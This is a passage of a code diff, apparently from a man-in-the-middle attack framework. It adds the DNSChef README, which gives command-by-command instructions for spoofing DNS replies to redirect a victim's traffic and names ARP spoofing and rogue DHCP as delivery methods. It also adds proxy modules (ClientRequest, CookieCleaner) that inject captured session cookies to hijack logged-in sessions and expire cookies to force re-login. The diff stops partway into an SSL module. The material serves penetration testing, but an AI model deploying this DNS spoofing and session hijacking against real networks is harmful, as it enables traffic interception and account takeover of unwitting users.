+* **Windows** - Select *Network Connections* from the *Control Panel*. Next select one of the connections (e.g. "Local Area Connection"), right-click on it and select properties. From within a newly appearing dialog box, select *Internet Protocol (TCP/IP)* and click on properties. At last select *Use the following DNS server addresses* radio button and enter the IP address with DNSChef running. For example, if running locally enter 127.0.0.1.
+
+* **OS X** - Open *System Preferences* and click on the *Network* icon. Select the active interface and fill in the *DNS Server* field. If you are using Airport then you will have to click on *Advanced...* button and edit DNS servers from there. Alternatively, you can edit */etc/resolv.conf* and add a fake nameserver to the very top there (e.g "nameserver 127.0.0.1").
+
+* **iOS** - Open *Settings* and select *General*. Next select on *Wi-Fi* and click on a blue arrow to the right of an active Access Point from the list. Edit DNS entry to point to the host with DNSChef running. Make sure you have disabled Cellular interface (if available).
+
+* **Android** - Open *Settings* and select *Wireless and network*. Click on *Wi-Fi settings* and select *Advanced* after pressing the *Options* button on the phone. Enable *Use static IP* checkbox and configure a custom DNS server.
+
+If you do not have the ability to modify device's DNS settings manually, then you still have several options involving techniques such as [ARP Spoofing](http://en.wikipedia.org/wiki/ARP_spoofing), [Rogue DHCP](http://www.yersinia.net/doc.htm) and other creative methods.
+
+At last you need to configure a fake service where DNSChef will point all of the requests. For example, if you are trying to intercept web traffic, you must bring up either a separate web server running on port 80 or set up a web proxy (e.g. Burp) to intercept traffic. DNSChef will point queries to your proxy/server host with properly configured services.
+
+Running DNSChef
+===============
+
+DNSChef is a cross-platform application developed in Python which should run on most platforms which have a Python interpreter. You can use the supplied *dnschef.exe* executable to run it on Windows hosts without installing a Python interpreter. This guide will concentrate on Unix environments; however, all of the examples below were tested to work on Windows as well.
+
+Let's get a taste of DNSChef with its most basic monitoring functionality. Execute the following command as root (required to start a server on port 53):
+
+ # ./dnschef.py
+
+ _ _ __
+ | | version 0.2 | | / _|
+ __| |_ __ ___ ___| |__ ___| |_
+ / _` | '_ \/ __|/ __| '_ \ / _ \ _|
+ | (_| | | | \__ \ (__| | | | __/ |
+ \__,_|_| |_|___/\___|_| |_|\___|_|
+ iphelix@thesprawl.org
+
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] No parameters were specified. Running in full proxy mode
+
+
+Without any parameters, DNSChef will run in full proxy mode. This means that all requests will simply be forwarded to an upstream DNS server (8.8.8.8 by default) and returned back to the quering host. For example, let's query an "A" record for a domain and observe results:
+
+ $ host -t A thesprawl.org
+ thesprawl.org has address 108.59.3.64
+
+DNSChef will print the following log line showing time, source IP address, type of record requested and most importantly which name was queried:
+
+ [23:54:03] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
+
+This mode is useful for simple application monitoring where you need to figure out which domains it uses for its communications.
+
+DNSChef has full support for IPv6 which can be activated using *-6* or *--ipv6** flags. It works exactly as IPv4 mode with the exception that default listening interface is switched to ::1 and default DNS server is switched to 2001:4860:4860::8888. Here is a sample output:
+
+ # ./dnschef.py -6
+ _ _ __
+ | | version 0.2 | | / _|
+ __| |_ __ ___ ___| |__ ___| |_
+ / _` | '_ \/ __|/ __| '_ \ / _ \ _|
+ | (_| | | | \__ \ (__| | | | __/ |
+ \__,_|_| |_|___/\___|_| |_|\___|_|
+ iphelix@thesprawl.org
+
+ [*] Using IPv6 mode.
+ [*] DNSChef started on interface: ::1
+ [*] Using the following nameservers: 2001:4860:4860::8888
+ [*] No parameters were specified. Running in full proxy mode
+ [00:35:44] ::1: proxying the response of type 'A' for thesprawl.org
+ [00:35:44] ::1: proxying the response of type 'AAAA' for thesprawl.org
+ [00:35:44] ::1: proxying the response of type 'MX' for thesprawl.org
+
+NOTE: By default, DNSChef creates a UDP listener. You can use TCP instead with the *--tcp* argument discussed later.
+
+Intercept all responses
+-----------------------
+
+Now, that you know how to start DNSChef let's configure it to fake all replies to point to 127.0.0.1 using the *--fakeip* parameter:
+
+ # ./dnschef.py --fakeip 127.0.0.1 -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] Cooking all A replies to point to 127.0.0.1
+ [23:55:57] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
+ [23:55:57] 127.0.0.1: proxying the response of type 'AAAA' for google.com
+ [23:55:57] 127.0.0.1: proxying the response of type 'MX' for google.com
+
+In the above output you an see that DNSChef was configured to proxy all requests to 127.0.0.1. The first line of log at 08:11:23 shows that we have "cooked" the "A" record response to point to 127.0.0.1. However, further requests for 'AAAA' and 'MX' records are simply proxied from a real DNS server. Let's see the output from requesting program:
+
+ $ host google.com localhost
+ google.com has address 127.0.0.1
+ google.com has IPv6 address 2001:4860:4001:803::1001
+ google.com mail is handled by 10 aspmx.l.google.com.
+ google.com mail is handled by 40 alt3.aspmx.l.google.com.
+ google.com mail is handled by 30 alt2.aspmx.l.google.com.
+ google.com mail is handled by 20 alt1.aspmx.l.google.com.
+ google.com mail is handled by 50 alt4.aspmx.l.google.com.
+
+As you can see the program was tricked to use 127.0.0.1 for the IPv4 address. However, the information obtained from IPv6 (AAAA) and mail (MX) records appears completely legitimate. The goal of DNSChef is to have the least impact on the correct operation of the program, so if an application relies on a specific mailserver it will correctly obtain one through this proxied request.
+
+Let's fake one more request to illustrate how to target multiple records at the same time:
+
+ # ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] Cooking all A replies to point to 127.0.0.1
+ [*] Cooking all AAAA replies to point to ::1
+ [00:02:14] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
+ [00:02:14] 127.0.0.1: cooking the response of type 'AAAA' for google.com to ::1
+ [00:02:14] 127.0.0.1: proxying the response of type 'MX' for google.com
+
+In addition to the --fakeip flag, I have now specified --fakeipv6 designed to fake 'AAAA' record queries. Here is an updated program output:
+
+ $ host google.com localhost
+ google.com has address 127.0.0.1
+ google.com has IPv6 address ::1
+ google.com mail is handled by 10 aspmx.l.google.com.
+ google.com mail is handled by 40 alt3.aspmx.l.google.com.
+ google.com mail is handled by 30 alt2.aspmx.l.google.com.
+ google.com mail is handled by 20 alt1.aspmx.l.google.com.
+ google.com mail is handled by 50 alt4.aspmx.l.google.com.
+
+Once more all of the records not explicitly overriden by the application were proxied and returned from the real DNS server. However, IPv4 (A) and IPv6 (AAAA) were both faked to point to a local machine.
+
+DNSChef supports multiple record types:
+
+ +--------+--------------+-----------+--------------------------+
+ | Record | Description |Argument | Example |
+ +--------+--------------+-----------+--------------------------+
+ | A | IPv4 address |--fakeip | --fakeip 192.0.2.1 |
+ | AAAA | IPv6 address |--fakeipv6 | --fakeipv6 2001:db8::1 |
+ | MX | Mail server |--fakemail | --fakemail mail.fake.com |
+ | CNAME | CNAME record |--fakealias| --fakealias www.fake.com |
+ | NS | Name server |--fakens | --fakens ns.fake.com |
+ +--------+--------------+-----------+--------------------------+
+
+NOTE: For usability not all DNS record types are exposed on the command line. Additional records such as PTR, TXT, SOA, etc. can be specified using the --file flag and an appropriate record header. See the [external definitions file](#external-definitions-file) section below for details.
+
+At last let's observe how the application handles queries of type ANY:
+
+ # ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 --fakemail mail.fake.com --fakealias www.fake.com --fakens ns.fake.com -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] Cooking all A replies to point to 127.0.0.1
+ [*] Cooking all AAAA replies to point to ::1
+ [*] Cooking all MX replies to point to mail.fake.com
+ [*] Cooking all CNAME replies to point to www.fake.com
+ [*] Cooking all NS replies to point to ns.fake.com
+ [00:17:29] 127.0.0.1: cooking the response of type 'ANY' for google.com with all known fake records.
+
+DNS ANY record queries results in DNSChef returning every faked record that it knows about for an applicable domain. Here is the output that the program will see:
+
+ $ host -t ANY google.com localhost
+ google.com has address 127.0.0.1
+ google.com has IPv6 address ::1
+ google.com mail is handled by 10 mail.fake.com.
+ google.com is an alias for www.fake.com.
+ google.com name server ns.fake.com.
+
+Filtering domains
+-----------------
+
+Using the above example, consider you only want to intercept requests for *thesprawl.org* and leave queries to all other domains such as *webfaction.com* without modification. You can use the *--fakedomains* parameter as illustrated below:
+
+ # ./dnschef.py --fakeip 127.0.0.1 --fakedomains thesprawl.org -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] Cooking replies to point to 127.0.0.1 matching: thesprawl.org
+ [00:23:37] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 127.0.0.1
+ [00:23:52] 127.0.0.1: proxying the response of type 'A' for mx9.webfaction.com
+
+From the above example the request for *thesprawl.org* was faked; however, the request for *mx9.webfaction.com* was left alone. Filtering domains is very useful when you attempt to isolate a single application without breaking the rest.
+
+NOTE: DNSChef will not verify whether the domain exists or not before faking the response. If you have specified a domain it will always resolve to a fake value whether it really exists or not.
+
+Reverse filtering
+-----------------
+
+In another situation you may need to fake responses for all requests except a defined list of domains. You can accomplish this task using the *--truedomains* parameter as follows:
+
+ # ./dnschef.py --fakeip 127.0.0.1 --truedomains thesprawl.org,*.webfaction.com -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] Cooking replies to point to 127.0.0.1 not matching: *.webfaction.com, thesprawl.org
+ [00:27:57] 127.0.0.1: proxying the response of type 'A' for mx9.webfaction.com
+ [00:28:05] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
+
+There are several things going on in the above example. First notice the use of a wildcard (*). All domains matching *.webfaction.com will be reverse matched and resolved to their true values. The request for 'google.com' returned 127.0.0.1 because it was not on the list of excluded domains.
+
+NOTE: Wildcards are position specific. A mask of type *.thesprawl.org will match www.thesprawl.org but not www.test.thesprawl.org. However, a mask of type *.*.thesprawl.org will match thesprawl.org, www.thesprawl.org and www.test.thesprawl.org.
+
+External definitions file
+-------------------------
+
+There may be situations where defining a single fake DNS record for all matching domains may not be sufficient. You can use an external file with a collection of DOMAIN=RECORD pairs defining exactly where you want the request to go.
+
+For example, let create the following definitions file and call it *dnschef.ini*:
+
+ [A]
+ *.google.com=192.0.2.1
+ thesprawl.org=192.0.2.2
+ *.wordpress.*=192.0.2.3
+
+Notice the section header [A], it defines the record type to DNSChef. Now let's carefully observe the output of multiple queries:
+
+ # ./dnschef.py --file dnschef.ini -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [+] Cooking A replies for domain *.google.com with '192.0.2.1'
+ [+] Cooking A replies for domain thesprawl.org with '192.0.2.2'
+ [+] Cooking A replies for domain *.wordpress.* with '192.0.2.3'
+ [00:43:54] 127.0.0.1: cooking the response of type 'A' for google.com to 192.0.2.1
+ [00:44:05] 127.0.0.1: cooking the response of type 'A' for www.google.com to 192.0.2.1
+ [00:44:19] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 192.0.2.2
+ [00:44:29] 127.0.0.1: proxying the response of type 'A' for www.thesprawl.org
+ [00:44:40] 127.0.0.1: cooking the response of type 'A' for www.wordpress.org to 192.0.2.3
+ [00:44:51] 127.0.0.1: cooking the response of type 'A' for wordpress.com to 192.0.2.3
+ [00:45:02] 127.0.0.1: proxying the response of type 'A' for slashdot.org
+
+Both *google.com* and *www.google.com* matched the *\*.google.com* entry and correctly resolved to *192.0.2.1*. On the other hand *www.thesprawl.org* request was simply proxied instead of being modified. At last all variations of *wordpress.com*, *www.wordpress.org*, etc. matched the *\*.wordpress.\** mask and correctly resolved to *192.0.2.3*. At last an undefined *slashdot.org* query was simply proxied with a real response.
+
+You can specify section headers for all other supported DNS record types including the ones not explicitly exposed on the command line: [A], [AAAA], [MX], [NS], [CNAME], [PTR], [NAPTR] and [SOA]. For example, let's define a new [PTR] section in the 'dnschef.ini' file:
+
+ [PTR]
+ *.2.0.192.in-addr.arpa=fake.com
+
+Let's observe DNSChef's behavior with this new record type:
+
+ ./dnschef.py --file dnschef.ini -q
+ [sudo] password for iphelix:
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [+] Cooking PTR replies for domain *.2.0.192.in-addr.arpa with 'fake.com'
+ [00:11:34] 127.0.0.1: cooking the response of type 'PTR' for 1.2.0.192.in-addr.arpa to fake.com
+
+And here is what a client might see when performing reverse DNS queries:
+
+ $ host 192.0.2.1 localhost
+ 1.2.0.192.in-addr.arpa domain name pointer fake.com.
+
+Some records require exact formatting. Good examples are SOA and NAPTR
+
+ [SOA]
+ *.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600
+
+ [NAPTR]
+ *.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! .
+
+See sample dnschef.ini file for additional examples.
+
+Advanced Filtering
+------------------
+
+You can mix and match input from a file and command line. For example the following command uses both *--file* and *--fakedomains* parameters:
+
+ # ./dnschef.py --file dnschef.ini --fakeip 6.6.6.6 --fakedomains=thesprawl.org,slashdot.org -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [+] Cooking A replies for domain *.google.com with '192.0.2.1'
+ [+] Cooking A replies for domain thesprawl.org with '192.0.2.2'
+ [+] Cooking A replies for domain *.wordpress.* with '192.0.2.3'
+ [*] Cooking A replies to point to 6.6.6.6 matching: *.wordpress.*, *.google.com, thesprawl.org
+ [*] Cooking A replies to point to 6.6.6.6 matching: slashdot.org, *.wordpress.*, *.google.com, thesprawl.org
+ [00:49:05] 127.0.0.1: cooking the response of type 'A' for google.com to 192.0.2.1
+ [00:49:15] 127.0.0.1: cooking the response of type 'A' for slashdot.org to 6.6.6.6
+ [00:49:31] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 6.6.6.6
+ [00:50:08] 127.0.0.1: proxying the response of type 'A' for tor.com
+
+Notice the definition for *thesprawl.org* in the command line parameter took precedence over *dnschef.ini*. This could be useful if you want to override values in the configuration file. slashdot.org still resolves to the fake IP address because it was specified in the *--fakedomains* parameter. tor.com request is simply proxied since it was not specified in either command line or the configuration file.
+
+Other configurations
+====================
+
+For security reasons, DNSChef listens on a local 127.0.0.1 (or ::1 for IPv6) interface by default. You can make DNSChef listen on another interface using the *--interface* parameter:
+
+ # ./dnschef.py --interface 0.0.0.0 -q
+ [*] DNSChef started on interface: 0.0.0.0
+ [*] Using the following nameservers: 8.8.8.8
+ [*] No parameters were specified. Running in full proxy mode
+ [00:50:53] 192.0.2.105: proxying the response of type 'A' for thesprawl.org
+
+or for IPv6:
+
+ # ./dnschef.py -6 --interface :: -q
+ [*] Using IPv6 mode.
+ [*] DNSChef started on interface: ::
+ [*] Using the following nameservers: 2001:4860:4860::8888
+ [*] No parameters were specified. Running in full proxy mode
+ [00:57:46] 2001:db8::105: proxying the response of type 'A' for thesprawl.org
+
+By default, DNSChef uses Google's public DNS server to make proxy requests. However, you can define a custom list of nameservers using the *--nameservers* parameter:
+
+ # ./dnschef.py --nameservers 4.2.2.1,4.2.2.2 -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 4.2.2.1, 4.2.2.2
+ [*] No parameters were specified. Running in full proxy mode
+ [00:55:08] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
+
+It is possible to specify non-standard nameserver port using IP#PORT notation:
+
+ # ./dnschef.py --nameservers 192.0.2.2#5353 -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 192.0.2.2#5353
+ [*] No parameters were specified. Running in full proxy mode
+ [02:03:12] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
+
+At the same time it is possible to start DNSChef itself on an alternative port using the *-p port#* parameter:
+
+ # ./dnschef.py -p 5353 -q
+ [*] Listening on an alternative port 5353
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] No parameters were specified. Running in full proxy mode
+
+DNS protocol can be used over UDP (default) or TCP. DNSChef implements a TCP mode which can be activated with the *--tcp* flag.
+
+Internal architecture
+=====================
+
+Here is some information on the internals in case you need to adapt the tool for your needs. DNSChef is built on top of the SocketServer module and uses threading to help process multiple requests simultaneously. The tool is designed to listen on TCP or UDP ports (default is port 53) for incoming requests and forward those requests when necessary to a real DNS server over UDP.
+
+The excellent [dnslib library](https://bitbucket.org/paulc/dnslib/wiki/Home) is used to dissect and reassemble DNS packets. It is particularly useful when generating response packets based on queries. [IPy](https://github.com/haypo/python-ipy/) is used for IPv6 addresses manipulation. Both libraries come bundled with DNSChef to ease installation.
+
+DNSChef is capable of modifing queries for records of type "A", "AAAA", "MX", "CNAME", "NS", "TXT", "PTR", "NAPTR", "SOA", "ANY". It is very easy to expand or modify behavior for any record. Simply add another **if qtype == "RECORD TYPE")** entry and tell it what to reply with.
+
+Enjoy the tool and forward all requests and comments to iphelix [at] thesprawl.org.
+
+Happy hacking!
+ -Peter
diff --git a/core/publicsuffix/__init__.py b/core/dnschef/__init__.py
similarity index 100%
rename from core/publicsuffix/__init__.py
rename to core/dnschef/__init__.py
diff --git a/core/ferretng/ClientRequest.py b/core/ferretng/ClientRequest.py
new file mode 100644
index 0000000..c9eeb36
--- /dev/null
+++ b/core/ferretng/ClientRequest.py
@@ -0,0 +1,173 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import urlparse
+import logging
+import os
+import sys
+import random
+import re
+
+from twisted.web.http import Request
+from twisted.web.http import HTTPChannel
+from twisted.web.http import HTTPClient
+
+from twisted.internet import ssl
+from twisted.internet import defer
+from twisted.internet import reactor
+from twisted.internet.protocol import ClientFactory
+
+from ServerConnectionFactory import ServerConnectionFactory
+from ServerConnection import ServerConnection
+from SSLServerConnection import SSLServerConnection
+from URLMonitor import URLMonitor
+from CookieCleaner import CookieCleaner
+from DnsCache import DnsCache
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class ClientRequest(Request):
+
+ ''' This class represents incoming client requests and is essentially where
+ the magic begins. Here we remove the client headers we dont like, and then
+ respond with either favicon spoofing, session denial, or proxy through HTTP
+ or SSL to the server.
+ '''
+
+ def __init__(self, channel, queued, reactor=reactor):
+ Request.__init__(self, channel, queued)
+ self.reactor = reactor
+ self.urlMonitor = URLMonitor.getInstance()
+ self.cookieCleaner = CookieCleaner.getInstance()
+ self.dnsCache = DnsCache.getInstance()
+ #self.uniqueId = random.randint(0, 10000)
+
+ def cleanHeaders(self):
+ headers = self.getAllHeaders().copy()
+
+ if 'accept-encoding' in headers:
+ del headers['accept-encoding']
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Zapped encoding")
+
+ if 'if-modified-since' in headers:
+ del headers['if-modified-since']
+
+ if 'cache-control' in headers:
+ del headers['cache-control']
+
+ if 'host' in headers:
+ try:
+ for entry in self.urlMonitor.cookies[self.urlMonitor.hijack_client]:
+ if headers['host'] == entry['host']:
+ mitmf_logger.info("[Ferret-NG] Hijacking session for host: {}".format(headers['host']))
+ headers['cookie'] = entry['cookie']
+ except KeyError:
+ mitmf_logger.error("[Ferret-NG] No captured sessions (yet) from {}".format(self.urlMonitor.hijack_client))
+ pass
+
+ return headers
+
+ def getPathFromUri(self):
+ if (self.uri.find("http://") == 0):
+ index = self.uri.find('/', 7)
+ return self.uri[index:]
+
+ return self.uri
+
+ def handleHostResolvedSuccess(self, address):
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
+ host = self.getHeader("host")
+ headers = self.cleanHeaders()
+ client = self.getClientIP()
+ path = self.getPathFromUri()
+ url = 'http://' + host + path
+ self.uri = url # set URI to absolute
+
+ if self.content:
+ self.content.seek(0,0)
+
+ postData = self.content.read()
+
+ hostparts = host.split(':')
+ self.dnsCache.cacheResolution(hostparts[0], address)
+
+ if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending expired cookies")
+ self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
+
+ elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
+ if 'securelink' in headers:
+ del headers['securelink']
+
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via SSL ({})".format((client,url)))
+ self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
+
+ else:
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via HTTP")
+ #self.proxyViaHTTP(address, self.method, path, postData, headers)
+ port = 80
+ if len(hostparts) > 1:
+ port = int(hostparts[1])
+
+ self.proxyViaHTTP(address, self.method, path, postData, headers, port)
+
+ def handleHostResolvedError(self, error):
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host resolution error: {}".format(error))
+ try:
+ self.finish()
+ except:
+ pass
+
+ def resolveHost(self, host):
+ address = self.dnsCache.getCachedAddress(host)
+
+ if address != None:
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host cached: {} {}".format(host, address))
+ return defer.succeed(address)
+ else:
+ return reactor.resolve(host)
+
+ def process(self):
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolving host: {}".format(self.getHeader('host')))
+ host = self.getHeader('host').split(":")[0]
+
+ deferred = self.resolveHost(host)
+ deferred.addCallback(self.handleHostResolvedSuccess)
+ deferred.addErrback(self.handleHostResolvedError)
+
+ def proxyViaHTTP(self, host, method, path, postData, headers, port):
+ connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
+ connectionFactory.protocol = ServerConnection
+ #self.reactor.connectTCP(host, 80, connectionFactory)
+ self.reactor.connectTCP(host, port, connectionFactory)
+
+ def proxyViaSSL(self, host, method, path, postData, headers, port):
+ clientContextFactory = ssl.ClientContextFactory()
+ connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
+ connectionFactory.protocol = SSLServerConnection
+ self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
+
+ def sendExpiredCookies(self, host, path, expireHeaders):
+ self.setResponseCode(302, "Moved")
+ self.setHeader("Connection", "close")
+ self.setHeader("Location", "http://" + host + path)
+
+ for header in expireHeaders:
+ self.setHeader("Set-Cookie", header)
+
+ self.finish()
diff --git a/core/ferretng/CookieCleaner.py b/core/ferretng/CookieCleaner.py
new file mode 100644
index 0000000..5ba393c
--- /dev/null
+++ b/core/ferretng/CookieCleaner.py
@@ -0,0 +1,105 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging
+import string
+
+class CookieCleaner:
+ '''This class cleans cookies we haven't seen before. The basic idea is to
+ kill sessions, which isn't entirely straight-forward. Since we want this to
+ be generalized, there's no way for us to know exactly what cookie we're trying
+ to kill, which also means we don't know what domain or path it has been set for.
+
+ The rule with cookies is that specific overrides general. So cookies that are
+ set for mail.foo.com override cookies with the same name that are set for .foo.com,
+ just as cookies that are set for foo.com/mail override cookies with the same name
+ that are set for foo.com/
+
+ The best we can do is guess, so we just try to cover our bases by expiring cookies
+ in a few different ways. The most obvious thing to do is look for individual cookies
+ and nail the ones we haven't seen coming from the server, but the problem is that cookies are often
+ set by Javascript instead of a Set-Cookie header, and if we block those the site
+ will think cookies are disabled in the browser. So we do the expirations and whitlisting
+ based on client,server tuples. The first time a client hits a server, we kill whatever
+ cookies we see then. After that, we just let them through. Not perfect, but pretty effective.
+
+ '''
+
+ _instance = None
+
+ def __init__(self):
+ self.cleanedCookies = set();
+ self.enabled = False
+
+ @staticmethod
+ def getInstance():
+ if CookieCleaner._instance == None:
+ CookieCleaner._instance = CookieCleaner()
+
+ return CookieCleaner._instance
+
+ def setEnabled(self, enabled):
+ self.enabled = enabled
+
+ def isClean(self, method, client, host, headers):
+ if method == "POST": return True
+ if not self.enabled: return True
+ if not self.hasCookies(headers): return True
+
+ return (client, self.getDomainFor(host)) in self.cleanedCookies
+
+ def getExpireHeaders(self, method, client, host, headers, path):
+ domain = self.getDomainFor(host)
+ self.cleanedCookies.add((client, domain))
+
+ expireHeaders = []
+
+ for cookie in headers['cookie'].split(";"):
+ cookie = cookie.split("=")[0].strip()
+ expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)
+ expireHeaders.extend(expireHeadersForCookie)
+
+ return expireHeaders
+
+ def hasCookies(self, headers):
+ return 'cookie' in headers
+
+ def getDomainFor(self, host):
+ hostParts = host.split(".")
+ return "." + hostParts[-2] + "." + hostParts[-1]
+
+ def getExpireCookieStringFor(self, cookie, host, domain, path):
+ pathList = path.split("/")
+ expireStrings = list()
+
+ expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +
+ ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
+
+ expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +
+ ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
+
+ if len(pathList) > 2:
+ expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
+ domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
+
+ expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
+ host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
+
+ return expireStrings
+
+
diff --git a/core/ferretng/DnsCache.py b/core/ferretng/DnsCache.py
new file mode 100644
index 0000000..f0cc638
--- /dev/null
+++ b/core/ferretng/DnsCache.py
@@ -0,0 +1,49 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class DnsCache:
+
+ '''
+ The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
+ '''
+
+ _instance = None
+
+ def __init__(self):
+ self.customAddress = None
+ self.cache = {}
+
+ @staticmethod
+ def getInstance():
+ if DnsCache._instance == None:
+ DnsCache._instance = DnsCache()
+
+ return DnsCache._instance
+
+ def cacheResolution(self, host, address):
+ self.cache[host] = address
+
+ def getCachedAddress(self, host):
+ if host in self.cache:
+ return self.cache[host]
+
+ return None
diff --git a/core/ferretng/FerretProxy.py b/core/ferretng/FerretProxy.py
new file mode 100644
index 0000000..d95f786
--- /dev/null
+++ b/core/ferretng/FerretProxy.py
@@ -0,0 +1,24 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+from twisted.web.http import HTTPChannel
+from ClientRequest import ClientRequest
+
+class FerretProxy(HTTPChannel):
+
+ requestFactory = ClientRequest
diff --git a/core/ferretng/SSLServerConnection.py b/core/ferretng/SSLServerConnection.py
new file mode 100644
index 0000000..82dc8d1
--- /dev/null
+++ b/core/ferretng/SSLServerConnection.py
@@ -0,0 +1,95 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging, re, string
+
+from ServerConnection import ServerConnection
+from URLMonitor import URLMonitor
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class SSLServerConnection(ServerConnection):
+
+ '''
+ For SSL connections to a server, we need to do some additional stripping. First we need
